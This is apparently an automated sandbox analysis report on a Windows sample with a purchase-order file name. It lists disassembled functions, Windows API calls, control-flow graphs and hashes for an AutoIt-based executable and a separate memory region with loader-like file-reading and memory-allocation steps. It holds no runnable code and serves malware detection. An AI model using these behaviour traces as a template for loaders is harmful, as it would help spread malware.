                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: FileFind$AttributesCloseFirstlstrlen
                          • String ID:
                          • API String ID: 2695905019-0
                          • Opcode ID: 5e47eb9a0622bc54d8af0d44f20f0ac2d20f987d739157cd61ed730fa32fa186
                          • Instruction ID: 72e5484ac0476ac675f47052e4ba95c39618940d792c84601af89c5f99f1dffa
                          • Opcode Fuzzy Hash: 5e47eb9a0622bc54d8af0d44f20f0ac2d20f987d739157cd61ed730fa32fa186
                          • Instruction Fuzzy Hash: B4F0E531C1091C57C220AB7CAC0D8AA376C9E01334B504703F836C20F0EBB15D94EAD9
                          Function 00F0D730 Relevance: 21.6, APIs: 14, Instructions: 624windowsleeptimeCOMMON
                          Download Yara Rule
                          APIs
                          • GetInputState.USER32 ref: 00F0D807
                          • timeGetTime.WINMM ref: 00F0DA07
                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F0DB28
                          • TranslateMessage.USER32(?), ref: 00F0DB7B
                          • DispatchMessageW.USER32(?), ref: 00F0DB89
                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F0DB9F
                          • Sleep.KERNEL32(0000000A), ref: 00F0DBB1
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
                          • String ID:
                          • API String ID: 2189390790-0
                          • Opcode ID: f05561ec6170fef3fe7c3c86cd1858e79d3ed2209d7dea5922b26948ef028812
                          • Instruction ID: 2b36c34c459c8c21aa745b117b033aa90fff0a9ec1777f6401e5a46d185f57ae
                          • Opcode Fuzzy Hash: f05561ec6170fef3fe7c3c86cd1858e79d3ed2209d7dea5922b26948ef028812
                          • Instruction Fuzzy Hash: B3422671A08345EFD728CF24C844BAAB7E1BF86324F14861EE955872D1D774E848FB92
                          Function 00F02CD4 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53windowregistryCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                          • GetSysColorBrush.USER32(0000000F), ref: 00F02D07
                          • RegisterClassExW.USER32(00000030), ref: 00F02D31
                          • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00F02D42
                          • InitCommonControlsEx.COMCTL32(?), ref: 00F02D5F
                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00F02D6F
                          • LoadIconW.USER32(000000A9), ref: 00F02D85
                          • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00F02D94
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                          • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                          • API String ID: 2914291525-1005189915
                          • Opcode ID: b3d8bfa2ef2d955cd0b24013a356088dccf73e0fc1a04b1958482ee2a576f7f5
                          • Instruction ID: d8c3dd85147fd9e33dbb1df9fa0298a4b8c9afd3f9b3d483ef646df18cfe8dfa
                          • Opcode Fuzzy Hash: b3d8bfa2ef2d955cd0b24013a356088dccf73e0fc1a04b1958482ee2a576f7f5
                          • Instruction Fuzzy Hash: 0321C3B590221CAFEB00DFA4E859BDDBBB9FB08700F00411BF511A62A0D7B54544EF92
                          Function 00F4065B Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 302 f4065b-f4068b call f4042f 305 f406a6-f406b2 call f35221 302->305 306 f4068d-f40698 call f2f2c6 302->306 312 f406b4-f406c9 call f2f2c6 call f2f2d9 305->312 313 f406cb-f40714 call f4039a 305->313 311 f4069a-f406a1 call f2f2d9 306->311 322 f4097d-f40983 311->322 312->311 320 f40716-f4071f 313->320 321 f40781-f4078a GetFileType 313->321 324 f40756-f4077c GetLastError call f2f2a3 320->324 325 f40721-f40725 320->325 326 f407d3-f407d6 321->326 327 f4078c-f407bd GetLastError call f2f2a3 CloseHandle 321->327 324->311 325->324 331 f40727-f40754 call f4039a 325->331 329 f407df-f407e5 326->329 330 f407d8-f407dd 326->330 327->311 341 f407c3-f407ce call f2f2d9 327->341 334 f407e9-f40837 call f3516a 329->334 335 f407e7 329->335 330->334 331->321 331->324 345 f40847-f4086b call f4014d 334->345 346 f40839-f40845 call f405ab 334->346 335->334 341->311 352 f4086d 345->352 353 f4087e-f408c1 345->353 346->345 351 f4086f-f40879 call f386ae 346->351 351->322 352->351 355 f408e2-f408f0 353->355 356 f408c3-f408c7 353->356 359 f408f6-f408fa 355->359 360 f4097b 355->360 356->355 358 f408c9-f408dd 356->358 358->355 359->360 361 f408fc-f4092f CloseHandle call f4039a 359->361 360->322 364 f40931-f4095d GetLastError call f2f2a3 call f35333 361->364 365 f40963-f40977 361->365 364->365 365->360
                          APIs
                            • Part of subcall function 00F4039A: CreateFileW.KERNELBASE(00000000,00000000,?,00F40704,?,?,00000000,?,00F40704,00000000,0000000C), ref: 00F403B7
                          • GetLastError.KERNEL32 ref: 00F4076F
                          • __dosmaperr.LIBCMT ref: 00F40776
                          • GetFileType.KERNELBASE(00000000), ref: 00F40782
                          • GetLastError.KERNEL32 ref: 00F4078C
                          • __dosmaperr.LIBCMT ref: 00F40795
                          • CloseHandle.KERNEL32(00000000), ref: 00F407B5
                          • CloseHandle.KERNEL32(?), ref: 00F408FF
                          • GetLastError.KERNEL32 ref: 00F40931
                          • __dosmaperr.LIBCMT ref: 00F40938
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                          • String ID: H
                          • API String ID: 4237864984-2852464175
                          • Opcode ID: 87ab3db1822fbecf0cc44e858e59c6ae5fa50fdda1142ef1baf1611fdaccf50c
                          • Instruction ID: ddc9c8c9dd066ac6c4d805c1133ff9c6f767f91443cd07d989860126c57d3294
                          • Opcode Fuzzy Hash: 87ab3db1822fbecf0cc44e858e59c6ae5fa50fdda1142ef1baf1611fdaccf50c
                          • Instruction Fuzzy Hash: 7EA11432A101188FDF19AF78DC51BAE7FA1EB46320F24015AFD159B3D1DB359812EB91
                          Function 00F0344D Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201registryCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                            • Part of subcall function 00F03A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00FD1418,?,00F02E7F,?,?,?,00000000), ref: 00F03A78
                            • Part of subcall function 00F03357: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00F03379
                          • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00F0356A
                          • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00F4318D
                          • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00F431CE
                          • RegCloseKey.ADVAPI32(?), ref: 00F43210
                          • _wcslen.LIBCMT ref: 00F43277
                          • _wcslen.LIBCMT ref: 00F43286
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                          • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                          • API String ID: 98802146-2727554177
                          • Opcode ID: 6ac1b84d5eabc4840b4287655157428a80ce0ba9ccc9356d506e81ac9075058f
                          • Instruction ID: e64edf78a401ceb40fc2d6b224347eca41cf0e386cfebe991ac41d3ab57ffe9e
                          • Opcode Fuzzy Hash: 6ac1b84d5eabc4840b4287655157428a80ce0ba9ccc9356d506e81ac9075058f
                          • Instruction Fuzzy Hash: 9071DF715053059FC704EF69EC8286BBBE8FFA4350F40042EF545831A1EB789A48FBA2
                          Function 00F02B83 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63windowregistryCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                          • GetSysColorBrush.USER32(0000000F), ref: 00F02B8E
                          • LoadCursorW.USER32(00000000,00007F00), ref: 00F02B9D
                          • LoadIconW.USER32(00000063), ref: 00F02BB3
                          • LoadIconW.USER32(000000A4), ref: 00F02BC5
                          • LoadIconW.USER32(000000A2), ref: 00F02BD7
                          • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00F02BEF
                          • RegisterClassExW.USER32(?), ref: 00F02C40
                            • Part of subcall function 00F02CD4: GetSysColorBrush.USER32(0000000F), ref: 00F02D07
                            • Part of subcall function 00F02CD4: RegisterClassExW.USER32(00000030), ref: 00F02D31
                            • Part of subcall function 00F02CD4: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00F02D42
                            • Part of subcall function 00F02CD4: InitCommonControlsEx.COMCTL32(?), ref: 00F02D5F
                            • Part of subcall function 00F02CD4: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00F02D6F
                            • Part of subcall function 00F02CD4: LoadIconW.USER32(000000A9), ref: 00F02D85
                            • Part of subcall function 00F02CD4: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00F02D94
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                          • String ID: #$0$AutoIt v3
                          • API String ID: 423443420-4155596026
                          • Opcode ID: 531de2260d298b97d03d09b9655cc62b0496f3007b0f266b13fb608e0d689b46
                          • Instruction ID: 55eb66441efa3d2afad020ac60accecbe356bb65be7ba3169acdf684958a18bf
                          • Opcode Fuzzy Hash: 531de2260d298b97d03d09b9655cc62b0496f3007b0f266b13fb608e0d689b46
                          • Instruction Fuzzy Hash: DB212C70E0231CBBDB119FE5EC55A9E7FB6FB48B50F44411BE504A66A0D7B20540EF90
                          Function 00F03170 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 145windowtimeregistryCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 443 f03170-f03185 444 f031e5-f031e7 443->444 445 f03187-f0318a 443->445 444->445 446 f031e9 444->446 447 f031eb 445->447 448 f0318c-f03193 445->448 449 f031d0-f031d8 DefWindowProcW 446->449 450 f031f1-f031f6 447->450 451 f42dfb-f42e23 call f018e2 call f1e499 447->451 452 f03265-f0326d PostQuitMessage 448->452 453 f03199-f0319e 448->453 454 f031de-f031e4 449->454 456 f031f8-f031fb 450->456 457 f0321d-f03244 SetTimer RegisterWindowMessageW 450->457 486 f42e28-f42e2f 451->486 455 f03219-f0321b 452->455 459 f031a4-f031a8 453->459 460 f42e7c-f42e90 call f6bf30 453->460 455->454 465 f03201-f03214 KillTimer call f030f2 call f03c50 456->465 466 f42d9c-f42d9f 456->466 457->455 461 f03246-f03251 CreatePopupMenu 457->461 462 f42e68-f42e77 call f6c161 459->462 463 f031ae-f031b3 459->463 460->455 479 f42e96 460->479 461->455 462->455 469 f42e4d-f42e54 463->469 470 f031b9-f031be 463->470 465->455 472 f42dd7-f42df6 MoveWindow 466->472 473 f42da1-f42da5 466->473 469->449 482 f42e5a-f42e63 call f60ad7 469->482 477 f03253-f03263 call f0326f 470->477 478 f031c4-f031ca 470->478 472->455 480 f42dc6-f42dd2 SetFocus 473->480 481 f42da7-f42daa 473->481 477->455 478->449 478->486 479->449 480->455 481->478 487 f42db0-f42dc1 call f018e2 481->487 482->449 486->449 491 f42e35-f42e48 call f030f2 call f03837 486->491 487->455 491->449
                          APIs
                          • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,00F0316A,?,?), ref: 00F031D8
                          • KillTimer.USER32(?,00000001,?,?,?,?,?,00F0316A,?,?), ref: 00F03204
                          • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00F03227
                          • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,00F0316A,?,?), ref: 00F03232
                          • CreatePopupMenu.USER32 ref: 00F03246
                          • PostQuitMessage.USER32(00000000), ref: 00F03267
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                          • String ID: TaskbarCreated
                          • API String ID: 129472671-2362178303
                          • Opcode ID: 66bdcd14adc542109e95117bfad750737e9fca5c94967750d625b2a3a216e443
                          • Instruction ID: e43b237c45034c1d19e0fb86f2ad4b1d9b0df0499c67c20c0dbef494e3a0b844
                          • Opcode Fuzzy Hash: 66bdcd14adc542109e95117bfad750737e9fca5c94967750d625b2a3a216e443
                          • Instruction Fuzzy Hash: 9A411C36A44208BBDB145BB8DD2DB793B5EFB09350F080127F901C62E1CB759E40B7A2
                          Function 00F38D45 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 499 f38d45-f38d55 500 f38d57-f38d6a call f2f2c6 call f2f2d9 499->500 501 f38d6f-f38d71 499->501 518 f390f1 500->518 503 f38d77-f38d7d 501->503 504 f390d9-f390e6 call f2f2c6 call f2f2d9 501->504 503->504 507 f38d83-f38dae 503->507 523 f390ec call f327ec 504->523 507->504 508 f38db4-f38dbd 507->508 511 f38dd7-f38dd9 508->511 512 f38dbf-f38dd2 call f2f2c6 call f2f2d9 508->512 516 f390d5-f390d7 511->516 517 f38ddf-f38de3 511->517 512->523 520 f390f4-f390f9 516->520 517->516 522 f38de9-f38ded 517->522 518->520 522->512 526 f38def-f38e06 522->526 523->518 528 f38e23-f38e2c 526->528 529 f38e08-f38e0b 526->529 532 f38e4a-f38e54 528->532 533 f38e2e-f38e45 call f2f2c6 call f2f2d9 call f327ec 528->533 530 f38e15-f38e1e 529->530 531 f38e0d-f38e13 529->531 536 f38ebf-f38ed9 530->536 531->530 531->533 534 f38e56-f38e58 532->534 535 f38e5b-f38e79 call f33820 call f329c8 * 2 532->535 562 f3900c 533->562 534->535 572 f38e96-f38ebc call f39424 535->572 573 f38e7b-f38e91 call f2f2d9 call f2f2c6 535->573 539 f38edf-f38eef 536->539 540 f38fad-f38fb6 call f3f89b 536->540 539->540 544 f38ef5-f38ef7 539->544 551 f39029 540->551 552 f38fb8-f38fca 540->552 544->540 548 f38efd-f38f23 544->548 548->540 553 f38f29-f38f3c 548->553 555 f3902d-f39045 ReadFile 551->555 552->551 557 f38fcc-f38fdb GetConsoleMode 552->557 553->540 558 f38f3e-f38f40 553->558 560 f390a1-f390ac GetLastError 555->560 561 f39047-f3904d 555->561 557->551 563 f38fdd-f38fe1 557->563 558->540 564 f38f42-f38f6d 558->564 566 f390c5-f390c8 560->566 567 f390ae-f390c0 call f2f2d9 call f2f2c6 560->567 561->560 568 f3904f 561->568 570 f3900f-f39019 call f329c8 562->570 563->555 569 f38fe3-f38ffd ReadConsoleW 563->569 564->540 571 f38f6f-f38f82 564->571 579 f39005-f3900b call f2f2a3 566->579 580 f390ce-f390d0 566->580 567->562 575 f39052-f39064 568->575 577 f38fff GetLastError 569->577 578 f3901e-f39027 569->578 570->520 571->540 582 f38f84-f38f86 571->582 572->536 573->562 575->570 586 f39066-f3906a 575->586 577->579 578->575 579->562 580->570 582->540 590 f38f88-f38fa8 582->590 593 f39083-f3908e 586->593 594 f3906c-f3907c call f38a61 586->594 590->540 599 f39090 call f38bb1 593->599 600 f3909a-f3909f call f388a1 593->600 605 f3907f-f39081 594->605 606 f39095-f39098 599->606 600->606 605->570 606->605
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 098c528b876ffa00811b73d109171090ca09da10eb19f9bfc5333ad29fd840f4
                          • Instruction ID: b39a50224265ac111ad78ce4a56dabeebd3d220ef7259d1873a98212c9caedb2
                          • Opcode Fuzzy Hash: 098c528b876ffa00811b73d109171090ca09da10eb19f9bfc5333ad29fd840f4
                          • Instruction Fuzzy Hash: E6C1D1B5D08349AFCB159FB8DC41BADBBB0AF49330F144099F415A7392C7B98942EB60
                          Function 00EB2610 Relevance: 10.7, APIs: 7, Instructions: 239fileCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 607 eb2610-eb26be call eb0000 610 eb26c5-eb26eb call eb3520 CreateFileW 607->610 613 eb26ed 610->613 614 eb26f2-eb2702 610->614 615 eb283d-eb2841 613->615 619 eb2709-eb2723 VirtualAlloc 614->619 620 eb2704 614->620 617 eb2883-eb2886 615->617 618 eb2843-eb2847 615->618 621 eb2889-eb2890 617->621 622 eb2849-eb284c 618->622 623 eb2853-eb2857 618->623 626 eb272a-eb2741 ReadFile 619->626 627 eb2725 619->627 620->615 628 eb2892-eb289d 621->628 629 eb28e5-eb28fa 621->629 622->623 624 eb2859-eb2863 623->624 625 eb2867-eb286b 623->625 624->625 632 eb287b 625->632 633 eb286d-eb2877 625->633 634 eb2748-eb2788 VirtualAlloc 626->634 635 eb2743 626->635 627->615 636 eb289f 628->636 637 eb28a1-eb28ad 628->637 630 eb290a-eb2912 629->630 631 eb28fc-eb2907 VirtualFree 629->631 631->630 632->617 633->632 638 eb278a 634->638 639 eb278f-eb27aa call eb3770 634->639 635->615 636->629 640 eb28af-eb28bf 637->640 641 eb28c1-eb28cd 637->641 638->615 647 eb27b5-eb27bf 639->647 645 eb28e3 640->645 642 eb28da-eb28e0 641->642 643 eb28cf-eb28d8 641->643 642->645 643->645 645->621 648 eb27f2-eb2806 call eb3580 647->648 649 eb27c1-eb27f0 call eb3770 647->649 655 eb280a-eb280e 648->655 656 eb2808 648->656 649->647 657 eb281a-eb281e 655->657 658 eb2810-eb2814 FindCloseChangeNotification 655->658 656->615 659 eb282e-eb2837 657->659 660 eb2820-eb282b VirtualFree 657->660 658->657 659->610 659->615 660->659
                          APIs
                          • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 00EB26E1
                          • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00EB2907
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657349418.0000000000EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_eb0000_PO_987654345678.jbxd
                          Similarity
                          • API ID: CreateFileFreeVirtual
                          • String ID:
                          • API String ID: 204039940-0
                          • Opcode ID: e3e00bf9dbafeb2e33b0b1731302cb2fbf5584eb46f22b1b855d3d8c7a9348fe
                          • Instruction ID: c6d006b83ef9a6ff620097fb6419855287878e9c22748addfe581bd11885a316
                          • Opcode Fuzzy Hash: e3e00bf9dbafeb2e33b0b1731302cb2fbf5584eb46f22b1b855d3d8c7a9348fe
                          • Instruction Fuzzy Hash: 2AA10674E00209EBDB18DFA4C995BEEBBB5FF48304F209159E601BB280D7759A41DF94
                          Function 00F02C63 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 671 f02c63-f02cd3 CreateWindowExW * 2 ShowWindow * 2
                          APIs
                          • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00F02C91
                          • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00F02CB2
                          • ShowWindow.USER32(00000000,?,?,?,?,?,?,00F01CAD,?), ref: 00F02CC6
                          • ShowWindow.USER32(00000000,?,?,?,?,?,?,00F01CAD,?), ref: 00F02CCF
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Window$CreateShow
                          • String ID: AutoIt v3$edit
                          • API String ID: 1584632944-3779509399
                          • Opcode ID: 6be40b395a26b7c73bfdce55bfb7bc29a493d89cb35d397e668c77c721dff697
                          • Instruction ID: f85926ad36406cada4825cd9d32afc777fcc3fb15a8603ae5611cb84945b49fa
                          • Opcode Fuzzy Hash: 6be40b395a26b7c73bfdce55bfb7bc29a493d89cb35d397e668c77c721dff697
                          • Instruction Fuzzy Hash: E0F0DA756412987BEB311727AC08E773FBEE7C6F50B00005BF904A35A0C6621850FAB1
                          Function 00EB23B0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 155fileCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 786 eb23b0-eb2509 call eb0000 call eb22a0 CreateFileW 793 eb250b 786->793 794 eb2510-eb2520 786->794 795 eb25c0-eb25c5 793->795 797 eb2522 794->797 798 eb2527-eb2541 VirtualAlloc 794->798 797->795 799 eb2543 798->799 800 eb2545-eb255c ReadFile 798->800 799->795 801 eb255e 800->801 802 eb2560-eb259a call eb22e0 call eb12a0 800->802 801->795 807 eb259c-eb25b1 call eb2330 802->807 808 eb25b6-eb25be ExitProcess 802->808 807->808 808->795
                          APIs
                            • Part of subcall function 00EB22A0: Sleep.KERNELBASE(000001F4), ref: 00EB22B1
                          • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00EB24FF
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657349418.0000000000EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_eb0000_PO_987654345678.jbxd
                          Similarity
                          • API ID: CreateFileSleep
                          • String ID: LE0ZO3RNCFU1UFOJEXEV7QI
                          • API String ID: 2694422964-1889324611
                          • Opcode ID: fea47391bfe347af9bdf874a602f6abf269d660ca4c97fb712e094dac6c622be
                          • Instruction ID: f93a0623caaa044b00639d13541ad2b8e357b02d2c689a311f78c080b0638520
                          • Opcode Fuzzy Hash: fea47391bfe347af9bdf874a602f6abf269d660ca4c97fb712e094dac6c622be
                          • Instruction Fuzzy Hash: 8F618070D14288DBEF11DBA4C854BEFBBB5AF19304F145199E208BB2C1D6BA1B44CB66
                          Function 00F72947 Relevance: 7.8, APIs: 5, Instructions: 313fileCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                          • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00F72C05
                          • DeleteFileW.KERNEL32(?), ref: 00F72C87
                          • CopyFileW.KERNELBASE(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00F72C9D
                          • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00F72CAE
                          • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00F72CC0
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
